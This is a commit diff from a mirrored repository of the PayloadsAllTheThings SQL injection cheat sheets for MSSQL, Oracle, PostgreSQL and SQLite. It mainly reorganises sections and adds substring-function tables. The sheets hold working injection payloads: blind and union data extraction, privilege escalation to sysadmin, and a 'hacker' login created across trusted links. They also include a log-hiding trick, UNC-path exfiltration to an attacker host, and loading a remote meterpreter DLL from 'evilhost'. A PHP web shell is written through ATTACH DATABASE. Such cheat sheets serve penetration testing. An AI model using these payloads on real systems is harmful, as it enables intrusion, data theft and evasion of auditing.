mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent
This commit is contained in:
Swissky
parent
67af38aa4e
commit
9a908a15d2
@ -7,17 +7,15 @@
|
||||
|
||||
* [MSSQL Default Databases](#mssql-default-databases)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL User](#mssql-user)
|
||||
* [MSSQL Version](#mssql-version)
|
||||
* [MSSQL Hostname](#mssql-hostname)
|
||||
* [MSSQL Database Name](#mssql-database-name)
|
||||
* [MSSQL Database Credentials](#mssql-database-credentials)
|
||||
* [MSSQL Enumeration](#mssql-enumeration)
|
||||
* [MSSQL List Databases](#mssql-list-databases)
|
||||
* [MSSQL List Columns](#mssql-list-columns)
|
||||
* [MSSQL List Tables](#mssql-list-tables)
|
||||
* [MSSQL Union Based](#mssql-union-based)
|
||||
* [MSSQL Error Based](#mssql-error-based)
|
||||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked Query](#mssql-stacked-query)
|
||||
* [MSSQL Read File](#mssql-read-file)
|
||||
@ -27,9 +25,10 @@
|
||||
* [MSSQL Out of Band](#mssql-out-of-band)
|
||||
* [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
|
||||
* [MSSQL UNC Path](#mssql-unc-path)
|
||||
* [MSSQL Make User DBA](#mssql-make-user-dba)
|
||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||
* [MSSQL Privileges](#mssql-privileges)
|
||||
* [MSSQL List Permissions](#mssql-list-permissions)
|
||||
* [MSSQL Make User DBA](#mssql-make-user-dba)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -54,39 +53,6 @@
|
||||
| `;%00` | Null byte |
|
||||
|
||||
|
||||
## MSSQL User
|
||||
|
||||
```sql
|
||||
SELECT CURRENT_USER
|
||||
SELECT user_name();
|
||||
SELECT system_user;
|
||||
SELECT user;
|
||||
```
|
||||
|
||||
## MSSQL Version
|
||||
|
||||
```sql
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT HOST_NAME()
|
||||
SELECT @@hostname
|
||||
SELECT @@SERVERNAME
|
||||
SELECT SERVERPROPERTY('productversion')
|
||||
SELECT SERVERPROPERTY('productlevel')
|
||||
SELECT SERVERPROPERTY('edition');
|
||||
```
|
||||
|
||||
## MSSQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT DB_NAME()
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Database Credentials
|
||||
|
||||
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
|
||||
@ -102,56 +68,98 @@ SELECT DB_NAME()
|
||||
```
|
||||
|
||||
|
||||
## MSSQL List Databases
|
||||
## MSSQL Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ------------- | ----------------------------------------- |
|
||||
| DBMS version | `SELECT @@version` |
|
||||
| Database name | `SELECT DB_NAME()` |
|
||||
| Hostname | `SELECT HOST_NAME()` |
|
||||
| Hostname | `SELECT @@hostname` |
|
||||
| Hostname | `SELECT @@SERVERNAME` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
|
||||
| Hostname | `SELECT SERVERPROPERTY('edition')` |
|
||||
| User | `SELECT CURRENT_USER` |
|
||||
| User | `SELECT user_name();` |
|
||||
| User | `SELECT system_user;` |
|
||||
| User | `SELECT user;` |
|
||||
|
||||
|
||||
### MSSQL List Databases
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysdatabases;
|
||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+)
|
||||
|
||||
-- for N = 0, 1, 2, …
|
||||
SELECT DB_NAME(N);
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb
|
||||
-- (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
|
||||
```
|
||||
|
||||
## MSSQL List Columns
|
||||
### MSSQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
|
||||
-- for the current DB only
|
||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, column_name FROM information_schema.columns
|
||||
```
|
||||
|
||||
## MSSQL List Tables
|
||||
### MSSQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
|
||||
-- use xtype = 'V' for views
|
||||
SELECT name FROM master..sysobjects WHERE xtype = 'U';
|
||||
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
|
||||
|
||||
-- list column names and types for master..sometable
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
|
||||
|
||||
SELECT table_catalog, table_name FROM information_schema.columns
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
|
||||
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
|
||||
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Union Based
|
||||
|
||||
* Extract databases names
|
||||
|
||||
```sql
|
||||
-- extract databases names
|
||||
$ SELECT name FROM master..sysdatabases
|
||||
[*] Injection
|
||||
[*] msdb
|
||||
[*] tempdb
|
||||
```
|
||||
|
||||
-- extract tables from Injection database
|
||||
* Extract tables from Injection database
|
||||
|
||||
```sql
|
||||
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
|
||||
[*] Profiles
|
||||
[*] Roles
|
||||
[*] Users
|
||||
```
|
||||
|
||||
-- extract columns for the table Users
|
||||
* Extract columns for the table Users
|
||||
|
||||
```sql
|
||||
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
|
||||
[*] UserId
|
||||
[*] UserName
|
||||
```
|
||||
|
||||
-- Finally extract the data
|
||||
* Finally extract the data
|
||||
|
||||
```sql
|
||||
$ SELECT UserId, UserName from Users
|
||||
```
|
||||
|
||||
@ -179,14 +187,26 @@ $ SELECT UserId, UserName from Users
|
||||
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
|
||||
```
|
||||
|
||||
```sql
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||
SELECT message FROM data WHERE row = 1 and message like 't%'
|
||||
```
|
||||
|
||||
|
||||
### MSSQL Blind With Substring Equivalent
|
||||
|
||||
| Function | Example |
|
||||
| ----------- | ----------------------------------------------- |
|
||||
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
|
||||
|
||||
Examples:
|
||||
|
||||
```sql
|
||||
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
|
||||
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
|
||||
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
|
||||
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||
SELECT message FROM data WHERE row = 1 and message like 't%'
|
||||
```
|
||||
|
||||
|
||||
@ -312,12 +332,6 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Make User DBA
|
||||
|
||||
```sql
|
||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
## MSSQL Trusted Links
|
||||
|
||||
> The links between databases work even across forest trusts.
|
||||
@ -349,33 +363,44 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
|
||||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
## List Permissions
|
||||
|
||||
Listing effective permissions of current user on the server.
|
||||
## MSSQL Privileges
|
||||
|
||||
### MSSQL List Permissions
|
||||
|
||||
* Listing effective permissions of current user on the server.
|
||||
|
||||
```sql
|
||||
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
|
||||
```
|
||||
|
||||
Listing effective permissions of current user on the database.
|
||||
* Listing effective permissions of current user on the database.
|
||||
|
||||
```sql
|
||||
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
|
||||
```
|
||||
|
||||
Listing effective permissions of current user on a view.
|
||||
* Listing effective permissions of current user on a view.
|
||||
|
||||
```
|
||||
```sql
|
||||
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
|
||||
```
|
||||
|
||||
Check if current user is a member of the specified server role.
|
||||
* Check if current user is a member of the specified server role.
|
||||
|
||||
```sql
|
||||
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
|
||||
SELECT is_srvrolemember('sysadmin');
|
||||
```
|
||||
|
||||
|
||||
### MSSQL Make User DBA
|
||||
|
||||
```sql
|
||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
|
||||
## MSSQL OPSEC
|
||||
|
||||
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
|
||||
|
||||
@ -16,6 +16,7 @@
|
||||
* [Oracle SQL List Tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||
* [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
|
||||
* [Oracle SQL Time Based](#oracle-sql-time-based)
|
||||
* [Oracle SQL Out of Band](#oracle-sql-out-of-band)
|
||||
* [Oracle SQL Command Execution](#oracle-sql-command-execution)
|
||||
@ -129,6 +130,13 @@ When the injection point is inside a string use : `'||PAYLOAD--`
|
||||
| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
|
||||
|
||||
|
||||
### Oracle Blind With Substring Equivalent
|
||||
|
||||
| Function | Example |
|
||||
| ----------- | ----------------------------------------- |
|
||||
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
|
||||
|
||||
|
||||
## Oracle SQL Time Based
|
||||
|
||||
```sql
|
||||
|
||||
@ -15,6 +15,7 @@
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
* [PostgreSQL Blind With Substring Equivalent](#postgresql-blind-with-substring-equivalent)
|
||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||
* [PostgreSQL Out of Band](#postgresql-out-of-band)
|
||||
* [PostgreSQL Stacked Query](#postgresql-stacked-query)
|
||||
@ -119,11 +120,22 @@ Note, with the above queries, the output needs to be assembled in memory. For la
|
||||
|
||||
## PostgreSQL Blind
|
||||
|
||||
### PostgreSQL Blind With Substring Equivalent
|
||||
|
||||
| Function | Example |
|
||||
| ----------- | ----------------------------------------------- |
|
||||
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
|
||||
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
|
||||
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
|
||||
|
||||
Examples:
|
||||
|
||||
```sql
|
||||
' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE
|
||||
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
|
||||
```
|
||||
|
||||
|
||||
## PostgreSQL Time Based
|
||||
|
||||
#### Identify Time Based
|
||||
|
||||
@ -7,15 +7,14 @@
|
||||
|
||||
* [SQLite Comments](#sqlite-comments)
|
||||
* [SQLite Version](#sqlite-version)
|
||||
* [String Based - Extract Database Structure](#string-based---extract-database-structure)
|
||||
* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name)
|
||||
* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name)
|
||||
* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables)
|
||||
* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name)
|
||||
* [Boolean - Extract Info](#boolean---extract-info)
|
||||
* [Boolean - Error Based](#boolean---error-based)
|
||||
* [Time Based](#time-based)
|
||||
* [Remote Code Execution](#remote-code-execution)
|
||||
* [SQLite String](#sqlite-string)
|
||||
* [SQLite String Methodology](#sqlite-string-methodology)
|
||||
* [SQLite Blind](#sqlite-blind)
|
||||
* [SQLite Blind Methodology](#sqlite-blind-methodology)
|
||||
* [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)
|
||||
* [SQlite Error Based](#sqlite-error-based)
|
||||
* [SQlite Time Based](#sqlite-time-based)
|
||||
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
|
||||
* [Attach Database](#attach-database)
|
||||
* [Load_extension](#load_extension)
|
||||
* [References](#references)
|
||||
@ -23,10 +22,11 @@
|
||||
|
||||
## SQLite Comments
|
||||
|
||||
```sql
|
||||
--
|
||||
/**/
|
||||
```
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `/* SQLite Comment */` | C-style comment |
|
||||
| `--` | SQL comment |
|
||||
|
||||
|
||||
## SQLite Version
|
||||
|
||||
@ -34,82 +34,54 @@
|
||||
select sqlite_version();
|
||||
```
|
||||
|
||||
## SQLite String
|
||||
|
||||
## String Based - Extract Database Structure
|
||||
### SQLite String Methodology
|
||||
|
||||
```sql
|
||||
SELECT sql FROM sqlite_schema
|
||||
```
|
||||
if sqlite_version > 3.33.0
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master
|
||||
```
|
||||
| Description | SQL Query |
|
||||
| ----------------------- | ----------------------------------------- |
|
||||
| Extract Database Structure | `SELECT sql FROM sqlite_schema` |
|
||||
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
|
||||
| Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
|
||||
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
|
||||
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
|
||||
|
||||
|
||||
## Integer/String Based - Extract Table Name
|
||||
## SQLite Blind
|
||||
|
||||
```sql
|
||||
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||
```
|
||||
### SQLite Blind Methodology
|
||||
|
||||
| Description | SQL Query |
|
||||
| ----------------------- | ----------------------------------------- |
|
||||
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
|
||||
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
|
||||
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
|
||||
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
|
||||
|
||||
|
||||
## Integer/String Based - Extract Column Name
|
||||
### SQLite Blind With Substring Equivalent
|
||||
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
|
||||
```
|
||||
|
||||
For a clean output
|
||||
|
||||
```sql
|
||||
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||
```
|
||||
|
||||
Cleaner output
|
||||
|
||||
```sql
|
||||
SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
|
||||
```
|
||||
| Function | Example |
|
||||
| ----------- | ----------------------------------------- |
|
||||
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
|
||||
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
|
||||
|
||||
|
||||
## Boolean - Count Number Of Tables
|
||||
|
||||
```sql
|
||||
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
||||
```
|
||||
|
||||
## Boolean - Enumerating Table Name
|
||||
|
||||
```sql
|
||||
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
||||
```
|
||||
|
||||
## Boolean - Extract Info
|
||||
|
||||
```sql
|
||||
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||
```
|
||||
|
||||
### Boolean - Extract Info (order by)
|
||||
|
||||
```sql
|
||||
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
|
||||
```
|
||||
|
||||
## Boolean - Error Based
|
||||
## SQlite Error Based
|
||||
|
||||
```sql
|
||||
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||
```
|
||||
|
||||
## Time Based
|
||||
|
||||
## SQlite Time Based
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||
```
|
||||
|
||||
|
||||
## Remote Code Execution
|
||||
## SQLite Remote Code Execution
|
||||
|
||||
### Attach Database
|
||||
|
||||
@ -121,11 +93,12 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
|
||||
|
||||
### Load_extension
|
||||
|
||||
:warning: This component is disabled by default.
|
||||
|
||||
```sql
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
|
||||
Note: By default this component is disabled.
|
||||
|
||||
|
||||
## References
|
||||
|
||||
Loading…
Reference in New Issue
Block a user